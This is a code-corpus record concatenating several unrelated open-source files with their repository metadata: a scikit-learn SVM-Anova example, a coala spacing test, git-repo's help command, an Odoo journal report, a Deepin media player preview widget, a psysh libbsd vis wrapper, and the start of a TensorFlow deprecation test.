""" ================================================= SVM-Anova: SVM with univariate feature selection ================================================= This example shows how to perform univariate feature before running a SVC (support vector classifier) to improve the classification scores. """ print(__doc__) import numpy as np import matplotlib.pyplot as plt from sklearn import svm, datasets, feature_selection, cross_validation from sklearn.pipeline import Pipeline ############################################################################### # Import some data to play with digits = datasets.load_digits() y = digits.target # Throw away data, to be in the curse of dimension settings y = y[:200] X = digits.data[:200] n_samples = len(y) X = X.reshape((n_samples, -1)) # add 200 non-informative features X = np.hstack((X, 2 * np.random.random((n_samples, 200)))) ############################################################################### # Create a feature-selection transform and an instance of SVM that we # combine together to have an full-blown estimator transform = feature_selection.SelectPercentile(feature_selection.f_classif) clf = Pipeline([('anova', transform), ('svc', svm.SVC(C=1.0))]) ############################################################################### # Plot the cross-validation score as a function of percentile of features score_means = list() score_stds = list() percentiles = (1, 3, 6, 10, 15, 20, 30, 40, 60, 80, 100) for percentile in percentiles: clf.set_params(anova__percentile=percentile) # Compute cross-validation score using all CPUs this_scores = cross_validation.cross_val_score(clf, X, y, n_jobs=1) score_means.append(this_scores.mean()) score_stds.append(this_scores.std()) plt.errorbar(percentiles, score_means, np.array(score_stds)) plt.title( 'Performance of the SVM-Anova varying the percentile of features selected') plt.xlabel('Percentile') plt.ylabel('Prediction rate') plt.axis('tight') plt.show()
bsd-3-clause
dagdaggo/coala
tests/bearlib/spacing/SpacingHelperTest.py
26
4341
import unittest from coalib.bearlib.spacing.SpacingHelper import SpacingHelper from coalib.settings.Section import Section class SpacingHelperTest(unittest.TestCase): def setUp(self): self.uut = SpacingHelper() def test_needed_settings(self): self.assertEqual(list(self.uut.get_optional_settings()), ["tab_width"]) self.assertEqual(list(self.uut.get_non_optional_settings()), []) def test_construction(self): section = Section("test section") self.assertRaises(TypeError, SpacingHelper, "no integer") self.assertRaises(TypeError, self.uut.from_section, 5) self.assertEqual(self.uut.tab_width, self.uut.from_section(section).tab_width) # This is assumed in some tests. If you want to change this value, be # sure to change the tests too self.assertEqual(self.uut.DEFAULT_TAB_WIDTH, 4) self.assertEqual(self.uut.tab_width, self.uut.DEFAULT_TAB_WIDTH) def test_get_indentation(self): self.assertRaises(TypeError, self.uut.get_indentation, 5) self.assertEqual(self.uut.get_indentation("no indentation"), 0) self.assertEqual(self.uut.get_indentation(" indentation"), 1) self.assertEqual(self.uut.get_indentation(" indentation"), 2) self.assertEqual(self.uut.get_indentation("\tindentation"), self.uut.DEFAULT_TAB_WIDTH) # Having a space before the tab shouldn't make any difference self.assertEqual(self.uut.get_indentation(" \tindentation"), self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.get_indentation(" \t indentation"), self.uut.DEFAULT_TAB_WIDTH+1) self.assertEqual(self.uut.get_indentation("\t indentation"), self.uut.DEFAULT_TAB_WIDTH+1) # same tests but with indentation only self.assertEqual(self.uut.get_indentation("\t"), self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.get_indentation(" \t"), self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.get_indentation(" \t "), self.uut.DEFAULT_TAB_WIDTH+1) self.assertEqual(self.uut.get_indentation("\t "), self.uut.DEFAULT_TAB_WIDTH+1) self.assertEqual(self.uut.get_indentation("\t\t"), self.uut.DEFAULT_TAB_WIDTH*2) def test_replace_tabs_with_spaces(self): self.assertRaises(TypeError, self.uut.replace_tabs_with_spaces, 5) self.assertEqual(self.uut.replace_tabs_with_spaces(""), "") self.assertEqual(self.uut.replace_tabs_with_spaces(" "), " ") self.assertEqual(self.uut.replace_tabs_with_spaces("\t"), " "*self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.replace_tabs_with_spaces("\t\t"), " "*self.uut.DEFAULT_TAB_WIDTH*2) self.assertEqual(self.uut.replace_tabs_with_spaces(" \t"), " "*self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.replace_tabs_with_spaces(" \t"), " "*self.uut.DEFAULT_TAB_WIDTH) self.assertEqual(self.uut.replace_tabs_with_spaces("d \t "), "d" + " "*self.uut.DEFAULT_TAB_WIDTH) def test_replace_spaces_with_tabs(self): self.assertRaises(TypeError, self.uut.replace_spaces_with_tabs, 5) self.assertEqual(self.uut.replace_spaces_with_tabs(""), "") self.assertEqual(self.uut.replace_spaces_with_tabs(" "), " ") self.assertEqual(self.uut.replace_spaces_with_tabs(" "), "\t") self.assertEqual(self.uut.replace_spaces_with_tabs(" \t"), "\t") self.assertEqual(self.uut.replace_spaces_with_tabs(" dd "), " dd ") self.assertEqual(self.uut.replace_spaces_with_tabs(" dd d "), " dd d ") # One space shouldnt be replaced self.assertEqual(self.uut.replace_spaces_with_tabs(" dd "), " dd\t") self.assertEqual( self.uut.replace_spaces_with_tabs(" \t a_text another"), "\t a_text\tanother") self.assertEqual(self.uut.replace_spaces_with_tabs("d d"), "d d")
agpl-3.0
hanchentech/git-repo
subcmds/help.py
48
4794
# # Copyright (C) 2008 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import re import sys from formatter import AbstractFormatter, DumbWriter from color import Coloring from command import PagedCommand, MirrorSafeCommand class Help(PagedCommand, MirrorSafeCommand): common = False helpSummary = "Display detailed help on a command" helpUsage = """ %prog [--all|command] """ helpDescription = """ Displays detailed usage information about a command. """ def _PrintAllCommands(self): print 'usage: repo COMMAND [ARGS]' print """ The complete list of recognized repo commands are: """ commandNames = self.commands.keys() commandNames.sort() maxlen = 0 for name in commandNames: maxlen = max(maxlen, len(name)) fmt = ' %%-%ds %%s' % maxlen for name in commandNames: command = self.commands[name] try: summary = command.helpSummary.strip() except AttributeError: summary = '' print fmt % (name, summary) print """ See 'repo help <command>' for more information on a specific command. """ def _PrintCommonCommands(self): print 'usage: repo COMMAND [ARGS]' print """ The most commonly used repo commands are: """ commandNames = [name for name in self.commands.keys() if self.commands[name].common] commandNames.sort() maxlen = 0 for name in commandNames: maxlen = max(maxlen, len(name)) fmt = ' %%-%ds %%s' % maxlen for name in commandNames: command = self.commands[name] try: summary = command.helpSummary.strip() except AttributeError: summary = '' print fmt % (name, summary) print """ See 'repo help <command>' for more information on a specific command. See 'repo help --all' for a complete list of recognized commands. """ def _PrintCommandHelp(self, cmd): class _Out(Coloring): def __init__(self, gc): Coloring.__init__(self, gc, 'help') self.heading = self.printer('heading', attr='bold') self.wrap = AbstractFormatter(DumbWriter()) def _PrintSection(self, heading, bodyAttr): try: body = getattr(cmd, bodyAttr) except AttributeError: return if body == '' or body is None: return self.nl() self.heading('%s', heading) self.nl() self.heading('%s', ''.ljust(len(heading), '-')) self.nl() me = 'repo %s' % cmd.NAME body = body.strip() body = body.replace('%prog', me) asciidoc_hdr = re.compile(r'^\n?([^\n]{1,})\n([=~-]{2,})$') for para in body.split("\n\n"): if para.startswith(' '): self.write('%s', para) self.nl() self.nl() continue m = asciidoc_hdr.match(para) if m: title = m.group(1) section_type = m.group(2) if section_type[0] in ('=', '-'): p = self.heading else: def _p(fmt, *args): self.write(' ') self.heading(fmt, *args) p = _p p('%s', title) self.nl() p('%s', ''.ljust(len(title),section_type[0])) self.nl() continue self.wrap.add_flowing_data(para) self.wrap.end_paragraph(1) self.wrap.end_paragraph(0) out = _Out(self.manifest.globalConfig) out._PrintSection('Summary', 'helpSummary') cmd.OptionParser.print_help() out._PrintSection('Description', 'helpDescription') def _Options(self, p): p.add_option('-a', '--all', dest='show_all', action='store_true', help='show the complete list of commands') def Execute(self, opt, args): if len(args) == 0: if opt.show_all: self._PrintAllCommands() else: self._PrintCommonCommands() elif len(args) == 1: name = args[0] try: cmd = self.commands[name] except KeyError: print >>sys.stderr, "repo: '%s' is not a repo command." % name sys.exit(1) cmd.manifest = self.manifest self._PrintCommandHelp(cmd) else: self._PrintCommandHelp(self)
apache-2.0
CubicERP/odoo
addons/account/report/account_journal.py
255
10035
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from openerp.osv import osv from openerp.report import report_sxw from common_report_header import common_report_header class journal_print(report_sxw.rml_parse, common_report_header): def __init__(self, cr, uid, name, context=None): if context is None: context = {} super(journal_print, self).__init__(cr, uid, name, context=context) self.context = context self.period_ids = [] self.last_move_id = False self.journal_ids = [] self.sort_selection = 'am.name' self.localcontext.update({ 'time': time, 'lines': self.lines, 'sum_debit': self._sum_debit, 'sum_credit': self._sum_credit, 'get_start_period': self.get_start_period, 'get_end_period': self.get_end_period, 'get_account': self._get_account, 'get_filter': self._get_filter, 'get_start_date': self._get_start_date, 'get_end_date': self._get_end_date, 'get_fiscalyear': self._get_fiscalyear, 'display_currency':self._display_currency, 'get_sortby': self._get_sortby, 'get_target_move': self._get_target_move, 'check_last_move_id': self.check_last_move_id, 'set_last_move_id': self.set_last_move_id, 'tax_codes': self.tax_codes, 'sum_vat': self._sum_vat, }) def set_context(self, objects, data, ids, report_type=None): obj_move = self.pool.get('account.move.line') new_ids = ids self.query_get_clause = '' self.target_move = data['form'].get('target_move', 'all') if (data['model'] == 'ir.ui.menu'): self.period_ids = tuple(data['form']['periods']) self.journal_ids = tuple(data['form']['journal_ids']) new_ids = data['form'].get('active_ids', []) self.query_get_clause = 'AND ' self.query_get_clause += obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context', {})) self.sort_selection = data['form'].get('sort_selection', 'date') objects = self.pool.get('account.journal.period').browse(self.cr, self.uid, new_ids) elif new_ids: #in case of direct access from account.journal.period object, we need to set the journal_ids and periods_ids self.cr.execute('SELECT period_id, journal_id FROM account_journal_period WHERE id IN %s', (tuple(new_ids),)) res = self.cr.fetchall() self.period_ids, self.journal_ids = zip(*res) return super(journal_print, self).set_context(objects, data, ids, report_type=report_type) def set_last_move_id(self, move_id): self.last_move_id = move_id def check_last_move_id(self, move_id): ''' return True if we need to draw a gray line above this line, used to separate moves ''' if self.last_move_id: return not(self.last_move_id == move_id) return False def tax_codes(self, period_id, journal_id): ids_journal_period = self.pool.get('account.journal.period').search(self.cr, self.uid, [('journal_id', '=', journal_id), ('period_id', '=', period_id)]) self.cr.execute( 'select distinct tax_code_id from account_move_line ' \ 'where period_id=%s and journal_id=%s and tax_code_id is not null and state<>\'draft\'', (period_id, journal_id) ) ids = map(lambda x: x[0], self.cr.fetchall()) tax_code_ids = [] if ids: self.cr.execute('select id from account_tax_code where id in %s order by code', (tuple(ids),)) tax_code_ids = map(lambda x: x[0], self.cr.fetchall()) tax_codes = self.pool.get('account.tax.code').browse(self.cr, self.uid, tax_code_ids) return tax_codes def _sum_vat(self, period_id, journal_id, tax_code_id): self.cr.execute('select sum(tax_amount) from account_move_line where ' \ 'period_id=%s and journal_id=%s and tax_code_id=%s and state<>\'draft\'', (period_id, journal_id, tax_code_id)) return self.cr.fetchone()[0] or 0.0 def _sum_debit(self, period_id=False, journal_id=False): if journal_id and isinstance(journal_id, int): journal_id = [journal_id] if period_id and isinstance(period_id, int): period_id = [period_id] if not journal_id: journal_id = self.journal_ids if not period_id: period_id = self.period_ids if not (period_id and journal_id): return 0.0 move_state = ['draft','posted'] if self.target_move == 'posted': move_state = ['posted'] self.cr.execute('SELECT SUM(debit) FROM account_move_line l, account_move am ' 'WHERE l.move_id=am.id AND am.state IN %s AND l.period_id IN %s AND l.journal_id IN %s ' + self.query_get_clause + ' ', (tuple(move_state), tuple(period_id), tuple(journal_id))) return self.cr.fetchone()[0] or 0.0 def _sum_credit(self, period_id=False, journal_id=False): if journal_id and isinstance(journal_id, int): journal_id = [journal_id] if period_id and isinstance(period_id, int): period_id = [period_id] if not journal_id: journal_id = self.journal_ids if not period_id: period_id = self.period_ids if not (period_id and journal_id): return 0.0 move_state = ['draft','posted'] if self.target_move == 'posted': move_state = ['posted'] self.cr.execute('SELECT SUM(l.credit) FROM account_move_line l, account_move am ' 'WHERE l.move_id=am.id AND am.state IN %s AND l.period_id IN %s AND l.journal_id IN %s '+ self.query_get_clause+'', (tuple(move_state), tuple(period_id), tuple(journal_id))) return self.cr.fetchone()[0] or 0.0 def lines(self, period_id, journal_id=False): if not journal_id: journal_id = self.journal_ids else: journal_id = [journal_id] obj_mline = self.pool.get('account.move.line') self.cr.execute('update account_journal_period set state=%s where journal_id IN %s and period_id=%s and state=%s', ('printed', self.journal_ids, period_id, 'draft')) self.pool.get('account.journal.period').invalidate_cache(self.cr, self.uid, ['state'], context=self.context) move_state = ['draft','posted'] if self.target_move == 'posted': move_state = ['posted'] self.cr.execute('SELECT l.id FROM account_move_line l, account_move am WHERE l.move_id=am.id AND am.state IN %s AND l.period_id=%s AND l.journal_id IN %s ' + self.query_get_clause + ' ORDER BY '+ self.sort_selection + ', l.move_id',(tuple(move_state), period_id, tuple(journal_id) )) ids = map(lambda x: x[0], self.cr.fetchall()) return obj_mline.browse(self.cr, self.uid, ids) def _set_get_account_currency_code(self, account_id): self.cr.execute("SELECT c.symbol AS code "\ "FROM res_currency c,account_account AS ac "\ "WHERE ac.id = %s AND ac.currency_id = c.id" % (account_id)) result = self.cr.fetchone() if result: self.account_currency = result[0] else: self.account_currency = False def _get_fiscalyear(self, data): if data['model'] == 'account.journal.period': return self.pool.get('account.journal.period').browse(self.cr, self.uid, data['id']).fiscalyear_id.name return super(journal_print, self)._get_fiscalyear(data) def _get_account(self, data): if data['model'] == 'account.journal.period': return self.pool.get('account.journal.period').browse(self.cr, self.uid, data['id']).company_id.name return super(journal_print, self)._get_account(data) def _display_currency(self, data): if data['model'] == 'account.journal.period': return True return data['form']['amount_currency'] def _get_sortby(self, data): # TODO: deprecated, to remove in trunk if self.sort_selection == 'date': return self._translate('Date') elif self.sort_selection == 'ref': return self._translate('Reference Number') return self._translate('Date') class report_journal(osv.AbstractModel): _name = 'report.account.report_journal' _inherit = 'report.abstract_report' _template = 'account.report_journal' _wrapped_report_class = journal_print class report_salepurchasejournal(osv.AbstractModel): _name = 'report.account.report_salepurchasejournal' _inherit = 'report.abstract_report' _template = 'account.report_salepurchasejournal' _wrapped_report_class = journal_print # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
hailongqiu/new-deepin-media-player
src/widget/preview.py
2
6604
#! /usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2012 Deepin, Inc. # 2012 Hailong Qiu # # Author: Hailong Qiu <[email protected]> # Maintainer: Hailong Qiu <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from dtk.ui.draw import draw_text from dtk.ui.constant import DEFAULT_FONT_SIZE from preview_bg import PreViewWin from mplayer.player import LDMP from mplayer.player import length_to_time from constant import PREVIEW_PV_WIDTH, PREVIEW_PV_HEIGHT import gtk import cairo import pango class PreView(object): def __init__(self, path = "", pos = 0): self.video_width = 0 self.video_height = 0 #self.mp = Mplayer() self.mp = LDMP() self.xid = None self.pos = pos # Preview background window. self.bg = PreViewWin() self.bg.set_size_request(124, 89) self.bg.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_MENU) # Set background window. self.bg.add_events(gtk.gdk.ALL_EVENTS_MASK) #self.bg.show_all() self.bg.set_offset(self.bg.get_offset_mid_value()) # Hide preview window. self.bg.show_time_label.connect("expose-event", self.draw_background) self.bg.connect("motion-notify-event", self.motion_hide_preview) self.bg.connect("enter-notify-event", self.motion_hide_preview) # Preview window. self.pv = gtk.Window(gtk.WINDOW_POPUP) # Set preview window. self.pv.set_size_request(PREVIEW_PV_WIDTH - 4, PREVIEW_PV_HEIGHT) self.pv.set_decorated(False) self.pv.set_keep_above(True) self.pv.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_MENU) self.pv.add_events(gtk.gdk.ALL_EVENTS_MASK) self.pv.connect("expose-event", self.draw_preview_video_background) # Hide preview window. self.pv.connect("motion-notify-event", self.motion_hide_preview) self.pv.connect("enter-notify-event", self.motion_hide_preview) def draw_preview_video_background(self, widget, event): cr = widget.window.cairo_create() x, y, w, h = widget.get_allocation() cr.rectangle(x, y, w, h) cr.fill() if self.video_width or self.video_height: video_ratio = float(self.video_width) / self.video_height bit = video_ratio - (float(w) / h) cr.set_source_rgb(0, 0, 0) if 0 == bit: return False elif bit < 0: s = w - h * (video_ratio) s = s / 2 # Draw left. cr.rectangle(x, y, s, h) cr.fill() # Draw right. cr.rectangle(x + s + h * video_ratio, y, s, h) cr.fill() elif bit > 0: video_ratio = float(self.video_height) / self.video_width s = h - w * video_ratio s = s / 2 # Draw UP. cr.rectangle(x, y, w + 1, s) cr.fill() # Draw bottom. cr.rectangle(x, y + s + w * (video_ratio), w, s) cr.fill() return True # Background window. def draw_background(self, widget, event): # Init. cr = widget.window.cairo_create() rect = widget.allocation x, y, w, h = rect.x, rect.y, rect.width, rect.height # Draw preview time. font_height_padding = 15 show_time_text = length_to_time(self.pos) time_hour, time_min, time_sec = 1, 3, 30 #self.mp.time(self.pos) draw_text(cr, #"%s:%s:%s" % (self.time_to_string(time_hour), self.time_to_string(time_min), self.time_to_string(time_sec)), show_time_text, x, h - font_height_padding, w, DEFAULT_FONT_SIZE, text_color = "#ffffff", alignment=pango.ALIGN_CENTER ) return True def move_preview(self, x, y): self.bg.move(int(x), int(y)) self.pv.move(int(x + 4), int(y+4)) def show_preview(self, pos): if self.pos != pos: self.pos = pos self.bg.queue_draw() self.bg.show_all() self.pv.show_all() region = gtk.gdk.Region() self.bg.window.input_shape_combine_region(region, 0, 0) #self.pv.show_all() self.pv.set_keep_above(True) # init preview window mplayer. self.init_mplayer_window(pos) def hide_preview(self): self.bg.hide_all() self.pv.hide_all() def quit_preview_player(self): self.hide_preview() self.mp.quit() def set_preview_path(self, path): self.pv.show_all() self.pv.set_opacity(0) self.mp.xid = self.pv.window.xid self.mp.quit() self.mp.player.uri = path self.mp.play() # 播放. self.mp.pause() # 暂停. self.mp.nomute() # 静音. self.pv.hide_all() self.pv.set_opacity(1) def time_to_string(self, time_pos): if 0<= time_pos <= 9: return "0" + str(time_pos) return str(time_pos) def motion_hide_preview(self, widget, event): self.hide_preview() def init_mplayer_window(self, pos): # 预览快进. self.mp.seek(pos) if __name__ == "__main__": pass
gpl-3.0
wqer1019/student-work
vendor/psy/psysh/test/tools/vis.py
710
3428
""" vis.py ====== Ctypes based module to access libbsd's strvis & strunvis functions. The `vis` function is the equivalent of strvis. The `unvis` function is the equivalent of strunvis. All functions accept unicode string as input and return a unicode string. Constants: ---------- * to select alternate encoding format `VIS_OCTAL`: use octal \ddd format `VIS_CSTYLE`: use \[nrft0..] where appropiate * to alter set of characters encoded (default is to encode all non-graphic except space, tab, and newline). `VIS_SP`: also encode space `VIS_TAB`: also encode tab `VIS_NL`: also encode newline `VIS_WHITE`: same as (VIS_SP | VIS_TAB | VIS_NL) `VIS_SAFE`: only encode "unsafe" characters * other `VIS_NOSLASH`: inhibit printing '\' `VIS_HTTP1808`: http-style escape % hex hex `VIS_HTTPSTYLE`: http-style escape % hex hex `VIS_MIMESTYLE`: mime-style escape = HEX HEX `VIS_HTTP1866`: http-style &#num; or &string; `VIS_NOESCAPE`: don't decode `\' `VIS_GLOB`: encode glob(3) magic characters :Authors: - ju1ius (http://github.com/ju1ius) :Version: 1 :Date: 2014-01-05 """ from ctypes import CDLL, c_char_p, c_int from ctypes.util import find_library __all__ = [ 'vis', 'unvis', 'VIS_OCTAL', 'VIS_CSTYLE', 'VIS_SP', 'VIS_TAB', 'VIS_NL', 'VIS_WHITE', 'VIS_SAFE', 'VIS_NOSLASH', 'VIS_HTTP1808', 'VIS_HTTPSTYLE', 'VIS_MIMESTYLE', 'VIS_HTTP1866', 'VIS_NOESCAPE', 'VIS_GLOB' ] ############################################################# # Constants from bsd/vis.h ############################################################# #to select alternate encoding format VIS_OCTAL = 0x0001 VIS_CSTYLE = 0x0002 # to alter set of characters encoded # (default is to encode all non-graphic except space, tab, and newline). VIS_SP = 0x0004 VIS_TAB = 0x0008 VIS_NL = 0x0010 VIS_WHITE = VIS_SP | VIS_TAB | VIS_NL VIS_SAFE = 0x0020 # other VIS_NOSLASH = 0x0040 VIS_HTTP1808 = 0x0080 VIS_HTTPSTYLE = 0x0080 VIS_MIMESTYLE = 0x0100 VIS_HTTP1866 = 0x0200 VIS_NOESCAPE = 0x0400 VIS_GLOB = 0x1000 ############################################################# # Import libbsd/vis functions ############################################################# _libbsd = CDLL(find_library('bsd')) _strvis = _libbsd.strvis _strvis.argtypes = [c_char_p, c_char_p, c_int] _strvis.restype = c_int _strunvis = _libbsd.strunvis _strvis.argtypes = [c_char_p, c_char_p] _strvis.restype = c_int def vis(src, flags=VIS_WHITE): """ Encodes the string `src` into libbsd's vis encoding. `flags` must be one of the VIS_* constants C definition: int strvis(char *dst, char *src, int flags); """ src = bytes(src, 'utf-8') dst_p = c_char_p(bytes(len(src) * 4)) src_p = c_char_p(src) flags = c_int(flags) bytes_written = _strvis(dst_p, src_p, flags) if -1 == bytes_written: raise RuntimeError('vis failed to encode string "{}"'.format(src)) return dst_p.value.decode('utf-8') def unvis(src): """ Decodes a string encoded by vis. C definition: int strunvis(char *dst, char *src); """ src = bytes(src, 'utf-8') dst_p = c_char_p(bytes(len(src))) src_p = c_char_p(src) bytes_written = _strunvis(dst_p, src_p) if -1 == bytes_written: raise RuntimeError('unvis failed to decode string "{}"'.format(src)) return dst_p.value.decode('utf-8')
mit
koobonil/Boss2D
Boss2D/addon/tensorflow-1.2.1_for_boss/tensorflow/python/util/deprecation_test.py
17
28084
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """tensor_util tests.""" # pylint: disable=unused-import from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.platform import test from tensorflow.python.platform import tf_logging as logging from tensorflow.python.util import deprecation class DeprecationTest(test.TestCase): def _assert_subset(self, expected_subset, actual_set): self.assertTrue( actual_set.issuperset(expected_subset), msg="%s is not a superset of %s." % (actual_set, expected_subset)) def test_deprecated_illegal_args(self): instructions = "This is how you update..." with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated("", instructions) with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated("07-04-2016", instructions) date = "2016-07-04" with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated(date, None) with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated(date, "") @test.mock.patch.object(logging, "warning", autospec=True) def test_no_date(self, mock_warning): date = None instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. Returns: Sum of args. """ return arg0 + arg1 self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed in a future version." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n" "\nReturns:" "\n Sum of args." % instructions, _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches( args[0], r"deprecated and will be removed") self._assert_subset(set(["in a future version", instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. Returns: Sum of args. """ return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n" "\nReturns:" "\n Sum of args." % (date, instructions), _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): """fn doc.""" return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated(date, instructions) def _fn(arg0, arg1): return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "DEPRECATED FUNCTION" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_instance_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @deprecation.deprecated(date, instructions) def _fn(self, arg0, arg1): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. Returns: Sum of args. """ return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n" "\nReturns:" "\n Sum of args." % (date, instructions), getattr(_Object, "_fn").__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _Object()._fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_instance_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @deprecation.deprecated(date, instructions) def _fn(self, arg0, arg1): """fn doc.""" return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), getattr(_Object, "_fn").__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _Object()._fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_instance_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @deprecation.deprecated(date, instructions) def _fn(self, arg0, arg1): return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual( "DEPRECATED FUNCTION" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), getattr(_Object, "_fn").__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _Object()._fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) def test_prop_wrong_order(self): with self.assertRaisesRegexp( ValueError, "make sure @property appears before @deprecated in your source code"): # pylint: disable=unused-variable class _Object(object): def __init(self): pass @deprecation.deprecated("2016-07-04", "Instructions.") @property def _prop(self): return "prop_wrong_order" @test.mock.patch.object(logging, "warning", autospec=True) def test_prop_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @property 